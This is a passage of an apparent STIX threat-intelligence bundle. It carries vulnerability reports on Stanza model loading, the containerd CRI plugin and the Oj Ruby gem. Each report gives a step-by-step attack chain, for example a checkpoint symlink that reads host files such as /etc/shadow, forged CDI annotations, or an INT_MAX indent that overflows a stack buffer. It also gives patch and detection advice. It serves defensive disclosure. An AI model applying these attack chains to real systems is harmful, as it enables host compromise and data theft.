Impact\n\nThis vulnerability, classified as CWE-502 (Deserialization of Untrusted Data), has severe consequences for any user, researcher, CI/CD pipeline, or production NLP service that loads a Stanza model pretrain file from sources not under exclusive cryptographic control. Attackers who can place a malicious `.pt` file can achieve arbitrary code execution with the full privileges of the process running `stanza.Pipeline()`. This can be a developer workstation, a Jupyter notebook server, or a GPU training node, potentially leading to credential theft (e.g., HuggingFace tokens, cloud IAM keys from environment variables), persistent backdoors, data exfiltration, and lateral movement in multi-tenant training infrastructure. The vulnerability affects Stanza versions up to and including 1.12.1.\n\n## Recommendation\n\n*   Upgrade Stanza to a patched version immediately (version 1.12.2 or higher) to mitigate CVE-2026-54499, which removes the unsafe fallback for `pickle.UnpicklingError`.\n*   Review and ensure all Stanza loaders, including those in `stanza/models/common/pretrain.py`, `stanza/models/coref/model.py`, `stanza/models/classifiers/trainer.py`, and `stanza/models/constituency/base_trainer.py`, have the unsafe fallback removed.\n*   Deploy the provided Sigma rules to detect suspicious process creation and file modifications indicative of successful exploitation of CVE-2026-54499.\n*   Enable comprehensive logging for `process_creation` and `file_event` on Linux and Windows systems where Stanza is used.\n",
      "published": "2026-06-19T19:36:57Z",
      "labels": [
        "deserialization",
        "rce",
        "python",
        "pytorch",
        "machine-learning",
        "supply-chain",
        "cwe-502",
        "nlp",
        "ghsa"
      ],
      "object_refs": [
        "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-v5jw-96jm-7h2c"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--46afa9d3-35e2-531f-93ab-23fa5e8f1291",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4fe3375c-262b-53a2-a499-96b0f60a0a14",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b8c0e445-0521-5947-9b0e-ab64f9319854",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--4fe3375c-262b-53a2-a499-96b0f60a0a14",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--4fe3375c-262b-53a2-a499-96b0f60a0a14",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "containerd CRI Checkpoint Restore CDI Annotation Smuggling Vulnerability (CVE-2026-53492)",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-53492, has been identified in the Container Runtime Interface (CRI) implementation of containerd versions prior to 2.1.9, 2.2.5, and 2.3.2. This flaw enables a user with legitimate Kubernetes pod creation permissions to bypass standard resource allocation and device plugin enforcement during the restoration of a container from a checkpoint. By crafting a malicious checkpoint image that includes forged Container Device Interface (CDI) annotations, an attacker can inject arbitrary device nodes or host mounts into the restored container. This can lead to privilege escalation within the compromised container, potentially allowing access to sensitive host resources. Successful exploitation requires CDI to be enabled on the target node and for matching host CDI specifications to be present.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains \"pod creation permissions\" within a Kubernetes cluster that utilizes a vulnerable version of containerd.\n2.  **Malicious Checkpoint Creation**: The attacker crafts a container checkpoint archive containing metadata with forged or unauthorized Container Device Interface (CDI) annotations. These annotations specify arbitrary host device nodes or host file system paths for mounting.\n3.  **Checkpoint Restoration Request**: The attacker initiates the restoration of a container from this maliciously crafted checkpoint archive via the Kubernetes API, which subsequently interacts with containerd's CRI.\n4.  **Annotation Smuggling**: The vulnerable containerd CRI implementation improperly trusts and processes the CDI annotations embedded within the untrusted checkpoint image metadata, rather than strictly adhering to the pod's original create-time specification.\n5.  **Unauthorized Resource Injection**: containerd proceeds to create the new container instance, incorporating the smuggled CDI annotations, which results in unauthorized host device nodes or file system paths being mounted directly into the container.\n6.  **Privilege Escalation / Host Access**: The restored container gains unapproved access to sensitive host resources (e.g., raw disk devices, critical system directories), effectively bypassing Kubernetes security policies and device plugin controls.\n7.  **Exploitation of Host Resources**: The attacker can then utilize this elevated access from within the container to further compromise the host, exfiltrate data, or establish persistence.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-53492 allows an attacker to achieve privilege escalation within a container, gaining unauthorized access to the host's device nodes and file system. This bypasses critical Kubernetes security mechanisms, including resource allocation policies and device plugin enforcement. The vulnerability can lead to container escape, enabling the attacker to read, modify, or exfiltrate sensitive data from the host, or to gain further control over the underlying node. The impact is significant in environments where CDI is enabled and sensitive host CDI specifications exist, potentially leading to full system compromise if critical devices or paths are exposed.\n\n## Recommendation\n\n*   **Patch CVE-2026-53492**: Immediately update containerd to a patched version (2.3.2, 2.2.5, or 2.1.9) to mitigate CVE-2026-53492.\n*   **Recreate Containers**: After patching, recreate any existing containers that were restored from untrusted checkpoints to ensure removal of any smuggled configurations.\n*   **Restrict Untrusted Checkpoints**: Implement strict policies to restrict the restoration of containers from untrusted checkpoint images.\n*   **CDI Workaround**: If Container Device Interface (CDI) capabilities are not actively utilized, relocate or remove host CDI specifications from the default directories (`/etc/cdi` and `/var/run/cdi`) as a temporary mitigation.\n*   **Deploy Detection Rules**: Deploy the provided Sigma rules to your SIEM to detect post-exploitation activity related to CVE-2026-53492.\n",
      "published": "2026-06-19T19:43:46Z",
      "labels": [
        "containerd",
        "kubernetes",
        "vulnerability",
        "privilege-escalation",
        "linux",
        "cloud"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-33vj-92qq-66hc"
        },
        {
          "source_name": "reference",
          "url": "CVE-2026-53492"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8c837a75-3bc7-5e56-b553-6558d9e7919b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a0763217-0ce4-54ab-83ef-2576c4904c4f",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--83d1ffb5-802b-59a4-b101-0b14a5b76b55",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a0763217-0ce4-54ab-83ef-2576c4904c4f",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a0763217-0ce4-54ab-83ef-2576c4904c4f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Arbitrary Host File Read via Symlink Following in containerd CRI Checkpoint Restore (CVE-2026-53489)",
      "description": "## Overview\n\nA critical bug, tracked as CVE-2026-53489, has been identified in the containerd CRI plugin, impacting versions prior to 2.3.2, 2.2.5, and 2.1.9. This vulnerability allows an attacker to achieve arbitrary host file disclosure. The flaw stems from `containerd` failing to validate symlinked paths when restoring `container.log` from a checkpoint image. By crafting a malicious checkpoint that includes `container.log` as a symbolic link to a sensitive host file, an attacker can leverage a standard `kubectl logs` command to retrieve the contents of that file. This poses a significant risk of data exfiltration and unauthorized information gathering from the underlying host system, impacting Kubernetes and other container orchestration environments. The vulnerability was independently discovered by multiple researchers, indicating a high likelihood of exploitation potential.\n\n## Attack Chain\n\n1.  **Craft Malicious Checkpoint/Image**: An attacker creates a container image or checkpoint where the expected `container.log` file is replaced with a symbolic link pointing to a sensitive file on the host filesystem (e.g., `/etc/shadow`, `/root/.ssh/id_rsa`).\n2.  **Deploy Malicious Image**: The attacker deploys this specially crafted container image to a Kubernetes cluster or container environment running a vulnerable version of containerd.\n3.  **Containerd Restores Checkpoint**: When the container is started or its checkpoint is restored, the `containerd` CRI plugin attempts to initialize the `container.log` path.\n4.  **Symlink Traversal**: Due to the vulnerability (CVE-2026-53489), `containerd` follows the malicious symlink instead of validating the path, effectively linking the container's `container.log` output stream to the sensitive host file.\n5.  **Attacker Requests Logs**: The attacker, possessing appropriate permissions to view container logs (e.g., via `kubectl logs`), issues a command to retrieve the logs of the compromised container.\n6.  **Containerd Reads Target File**: `containerd`, processing the log request, reads the content of the file pointed to by the symlink (the sensitive host file).\n7.  **Data Exfiltration**: The content of the sensitive host file is then returned to the attacker as if it were legitimate container log output, achieving arbitrary host file disclosure.\n\n## Impact\n\nThe successful exploitation of CVE-2026-53489 can lead to significant information disclosure. Attackers can read any file accessible by the `containerd` process on the host system. This could include sensitive configuration files (e.g., `/etc/kubernetes/kubelet.conf`), SSH keys, credentials, or other proprietary data stored on the host. While the vulnerability doesn't directly grant remote code execution, the ability to read arbitrary files can be a crucial step in further privilege escalation or data exfiltration attacks within a compromised Kubernetes cluster or container host. All organizations running containerd versions prior to the patched releases are at risk, particularly those that allow deployment of untrusted container images.\n\n## Recommendation\n\n*   **Patch CVE-2026-53489**: Immediately update containerd to patched versions (2.3.2, 2.2.5, or 2.1.9) as described in the GHSA advisory.\n*   **Implement Image Trust**: Ensure that only trusted container images and checkpoints are used within your environment to minimize the risk of malicious artifacts.\n*   **Deploy File Access Monitoring**: Configure host-level file activity monitoring (e.g., Auditd, Falco) to detect suspicious `containerd` process access to sensitive files or directories. Deploy the Sigma rules provided in this brief.\n*   **Enable Sysmon for Linux**: For Linux hosts, consider enabling Sysmon for Linux to capture `FileCreate` and `FileRead` events which can be used by the Sigma rules below.\n",
      "published": "2026-06-19T19:44:45Z",
      "labels": [
        "container",
        "kubernetes",
        "vulnerability",
        "data-exfiltration",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-rgh6-rfwx-v388"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5235db88-c23f-5fc6-810d-a1e41644a442",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc5d2b5c-0c13-5a89-a4ce-59a6328402bc",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--38669cb2-65a5-5ffc-bf29-b92326c16174",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc5d2b5c-0c13-5a89-a4ce-59a6328402bc",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fc5d2b5c-0c13-5a89-a4ce-59a6328402bc",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Critical containerd CRI Vulnerability (CVE-2026-53488) Leads to Host-Root Command Execution",
      "description": "## Overview\n\nA significant vulnerability, tracked as CVE-2026-53488, has been discovered in the containerd CRI plugin, impacting versions prior to 1.7.33, 2.0.10, 2.1.9, 2.2.5, and 2.3.2. This flaw allows for host-root command execution stemming from an image pull operation. The vulnerability arises because the CRI plugin fails to properly validate `LABEL` instructions embedded within an image's configuration. When a crafted container image is pulled, these unvalidated labels are propagated to the container's metadata. Subsequently, if another containerd plugin (e.g., the `restart-monitor` with a `binary://` logger) consumes these labels for its operations, it can inadvertently execute arbitrary commands with the privileges of the underlying host. The issue was independently discovered and responsibly disclosed by Anthropic Research, Claude, the GKE Security Team using Gemini, and Robert Prast. This vulnerability poses a severe risk, as it enables attackers to compromise container hosts simply by enticing users to pull a malicious image.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious container image (e.g., Docker image) that includes a specially formatted `LABEL` instruction within its Dockerfile, designed to execute arbitrary commands.\n2.  The attacker pushes this malicious image to a public or private container registry.\n3.  A user or automated system pulls the malicious container image to a vulnerable containerd host using a container runtime (e.g., Kubernetes via CRI).\n4.  The containerd CRI plugin processes the image configuration, including the unvalidated `LABEL` instruction.\n5.  Due to the vulnerability (CVE-2026-53488), the CRI plugin propagates this unvalidated, malicious `LABEL` content directly into the container's metadata or configuration.\n6.  A containerd plugin, such as the `restart-monitor` utilizing a `binary://` logger, consumes the crafted label from the container's metadata.\n7.  The consuming plugin attempts to interpret and execute the content of the malicious label as a command or binary path.\n8.  The arbitrary command embedded within the `LABEL` is executed on the host system with escalated privileges (often root), leading to host compromise.\n\n## Impact\n\nThe successful exploitation of CVE-2026-53488 grants an attacker the ability to execute arbitrary commands with host-root privileges on the compromised containerd host. This can lead to a complete compromise of the host system, allowing attackers to establish persistence, exfiltrate sensitive data, deploy additional malware (e.g., ransomware, cryptominers), or pivot to other systems within the environment. Given the widespread use of containerd in container orchestration platforms like Kubernetes, this vulnerability presents a critical threat to containerized environments, potentially impacting a broad range of industries and organizations that rely on such infrastructure.\n\n## Recommendation\n\n*   Patch CVE-2026-53488 on all vulnerable containerd installations immediately by upgrading to containerd versions 2.3.2, 2.2.5, 2.1.9, 2.0.10, or 1.7.33.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious process creation and network connections originating from containerd processes.\n*   Ensure Sysmon for Linux or equivalent process logging is enabled on all container hosts to activate the rules above.\n*   Implement strict image provenance and only use trusted container images from known-good registries, as recommended in the workarounds section.\n",
      "published": "2026-06-19T19:45:56Z",
      "labels": [
        "container",
        "container-runtime",
        "kubernetes",
        "rce",
        "supply-chain",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-xhf5-7wjv-pqxp"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a08e388f-abee-5113-82d3-c61067b7b51f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b7ad3828-f117-5148-9d47-42264026a1f1",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3135983b-b42f-59c4-bef7-009f0b9889d1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b7ad3828-f117-5148-9d47-42264026a1f1",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--adc4a447-4a06-5c71-8003-4c1b1b49c5d5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b7ad3828-f117-5148-9d47-42264026a1f1",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b7ad3828-f117-5148-9d47-42264026a1f1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Stack Buffer Overflow in Oj Ruby Gem (CVE-2026-54502)",
      "description": "## Overview\n\nAn attacker can exploit a critical stack-based buffer overflow vulnerability, identified as CVE-2026-54502, within the `Oj.dump` function of the `Oj` Ruby gem. This vulnerability affects all versions of the `Oj` gem prior to `3.17.2`. The flaw stems from insufficient input validation of the `:indent` parameter; when an application passes an extremely large integer value (such as `INT_MAX`, 2,147,483,647) to this parameter, the internal `fill_indent` function in `ext/oj/dump.h` calls `memset` without proper size checks. This leads to an attempt to write gigabytes of data into a small, stack-allocated buffer, corrupting the process's stack and resulting in an immediate denial of service through a crash. If exploited precisely, this could also enable remote code execution, posing a significant risk to the availability and integrity of Ruby applications using the vulnerable gem.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker identifies a Ruby application utilizing a vulnerable `Oj` gem version (prior to 3.17.2) and exposing a parameter or input field that directly or indirectly controls the `indent` argument for the `Oj.dump` function. This could be a web API endpoint, a file processing service, or another untrusted input vector.\n2.  **Input Provision**: The attacker crafts a request (e.g., an HTTP GET/POST parameter, an API call payload, or a crafted data file) containing an excessively large integer value (such as `2,147,483,647` representing `INT_MAX`) for the `indent` parameter.\n3.  **Application Processing**: The vulnerable Ruby application receives and processes this malicious input, passing the large integer value to the `Oj.dump` function's `indent` option without adequate validation.\n4.  **Vulnerable Function Call**: Internally, `Oj.dump` invokes its C extension `fill_indent` function (located in `ext/oj/dump.h`), which receives the large `indent` value.\n5.  **Buffer Overflow**: Within `fill_indent`, the `memset` function is called with the attacker-controlled large size, causing it to attempt to write gigabytes of data (`(size_t)opts-\u003eindent * depth`) into a much smaller, fixed-size stack-allocated `out` buffer (approximately 4KB).\n6.  **Stack Corruption and Crash**: This massive write operation overflows the `out` buffer, severely corrupting the stack memory of the Ruby process.\n7.  **Denial of Service**: The stack corruption immediately triggers an abnormal termination of the Ruby application process, leading to a denial of service for the affected service or application.\n8.  **Potential Code Execution**: In specific, carefully crafted scenarios, this stack corruption could potentially be leveraged to overwrite critical program control flow data (e.g., return addresses), allowing the attacker to achieve arbitrary code execution within the context of the vulnerable Ruby process.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-54502 primarily leads to a denial of service (DoS) for Ruby applications relying on the vulnerable `Oj` gem, causing immediate process crashes and service unavailability. Depending on the application's design, this can severely impact business operations and user access. In more sophisticated attack scenarios, the stack-based buffer overflow might be exploited to achieve arbitrary remote code execution (RCE). If RCE is successful, attackers could compromise the underlying server, execute commands with the privileges of the Ruby process, exfiltrate sensitive data, or establish further persistence within the environment, leading to significant data breaches, system compromise, and financial losses.\n\n## Recommendation\n\n*   Patch CVE-2026-54502 immediately by upgrading the `oj` gem to version 3.17.2 or later in all affected Ruby applications.\n*   Deploy the webserver Sigma rule \"Detect CVE-2026-54502 Exploitation Attempt - Large Oj.dump Indent\" in this brief to your SIEM to identify attempts at exploiting this vulnerability.\n*   Implement robust input validation for all user-supplied data, particularly for parameters that influence data formatting or transformation, to prevent excessively large integer values from reaching sensitive functions.\n*   Deploy the process creation Sigma rules \"Detect Ruby Process Spawning Suspicious Child Process (Windows)\" and \"Detect Ruby Process Spawning Suspicious Child Process (Linux)\" to monitor for potential remote code execution payloads from Ruby processes.\n",
      "published": "2026-06-19T19:47:47Z",
      "labels": [
        "overflow",
        "ruby",
        "gem",
        "denial-of-service",
        "remote-code-execution",
        "application-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-3v45-f3vh-wg7m"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--305be0a7-24d1-55da-90de-a71db8b686cf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f6b35f0d-9601-5de5-a37a-136b5ecacf6f",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f6b35f0d-9601-5de5-a37a-136b5ecacf6f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Oj: Use-After-Free in Oj::Parser array_class/hash_class GC Marking (CVE-2026-54901)",
      "description": "## Overview\n\nA critical Use-After-Free vulnerability, identified as CVE-2026-54901, impacts the `Oj::Parser` component of the widely used `oj` Ruby gem, specifically when operating in its 'usual' mode. The flaw stems from an omission in the `parser_mark` function within `ext/oj/parser.c`, which is responsible for registering GC mark callbacks. This function fails to correctly mark references to `array_class` and `hash_class` objects, held within the `Usual` struct. Consequently, if a Ruby garbage collection cycle is initiated after these class objects are assigned but prior to any parsing operations, the GC may prematurely reclaim the class objects, leaving the `Oj::Parser` instance with a dangling pointer. Subsequent attempts by the parser to dereference this freed memory, for example during a `parse` call involving `close_array_class` (`usual.c:405`) and `rb_funcallv`, will result in a segmentation fault and a complete application crash. This vulnerability affects all versions of the `oj` gem containing `ext/oj/usual.c` / `ext/oj/parser.c`, and has been confirmed in version 3.17.1, with a fix released in version 3.17.2.\n\n## Attack Chain\n\n1.  An application utilizing the `oj` gem instantiates `Oj::Parser` in its default 'usual' mode.\n2.  During initialization, the `Oj::Parser.new` method is called, and a custom `array_class` (or `hash_class`) object is provided as a configuration parameter.\n3.  The Ruby garbage collector (GC) is triggered, performing a full mark and sweep cycle before any JSON parsing operation is initiated by the `Oj::Parser` instance.\n4.  Due to the `parser_mark` function's defect, the custom `array_class` object is not correctly registered as a referenced object by the `Oj::Parser` instance.\n5.  The garbage collector proceeds to reclaim the custom `array_class` object from memory, leading to the `Oj::Parser` instance holding a dangling `VALUE` pointer to the now-freed memory.\n6.  The application subsequently attempts to parse JSON data using the vulnerable `Oj::Parser` instance via its `parse` method.\n7.  During the parsing process, specifically within functions like `close_array_class` (in `usual.c`), the `Oj::Parser` attempts to invoke `rb_funcallv` on the previously freed `array_class` object.\n8.  This attempt to dereference the dangling pointer accesses freed memory, triggering a segmentation fault.\n9.  The Ruby application crashes unexpectedly, resulting in a denial-of-service condition.\n\n## Impact\n\nThe successful exploitation of CVE-2026-54901 leads directly to a denial-of-service (DoS) condition, as the vulnerable application will experience a segmentation fault and crash. This can severely disrupt services that rely on the `oj` gem for JSON parsing, making them unavailable to users. Depending on the application's criticality and recovery mechanisms, this could range from temporary service interruption to significant downtime and data processing failures. The vulnerability specifically affects applications that utilize `Oj::Parser` in its 'usual' mode with custom `array_class` or `hash_class` objects, which might be common in custom Ruby-based web services or data processing pipelines. No specific victim counts or industry sectors have been publicly identified, but any Ruby application using an affected version of the `oj` gem is at risk.\n\n## Recommendation\n\n*   Immediately upgrade the `oj` gem to version `3.17.2` or later to remediate CVE-2026-54901.\n*   Deploy the `Detect Ruby Process Abnormal Termination` Sigma rule to identify unexpected `ruby` process shutdowns which could indicate exploitation or accidental triggering of CVE-2026-54901.\n*   Enable `process_creation` and `file_event` logging on all systems running Ruby applications to activate the rules above.\n*   Implement the `Detect Core Dump File Creation (Linux)` Sigma rule to identify instances of core dump generation, which often indicates application crashes like segmentation faults.\n",
      "published": "2026-06-19T21:05:25Z",
      "labels": [
        "ruby",
        "gem",
        "use-after-free",
        "segmentation-fault",
        "denial-of-service",
        "vulnerability",
        "cve-2026-54901"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-vwm4-62gf-x745"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebf47ec4-4842-5cf5-9a71-d8619bd83af3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--30a23351-b568-5c4d-a68e-d09c32b4460f",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--10be034c-f7f1-5a91-ae62-355238998ed1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--30a23351-b568-5c4d-a68e-d09c32b4460f",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--30a23351-b568-5c4d-a68e-d09c32b4460f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Heap Buffer Overflow in Oj.dump Exception Serialization via Large Indent (CVE-2026-54896)",
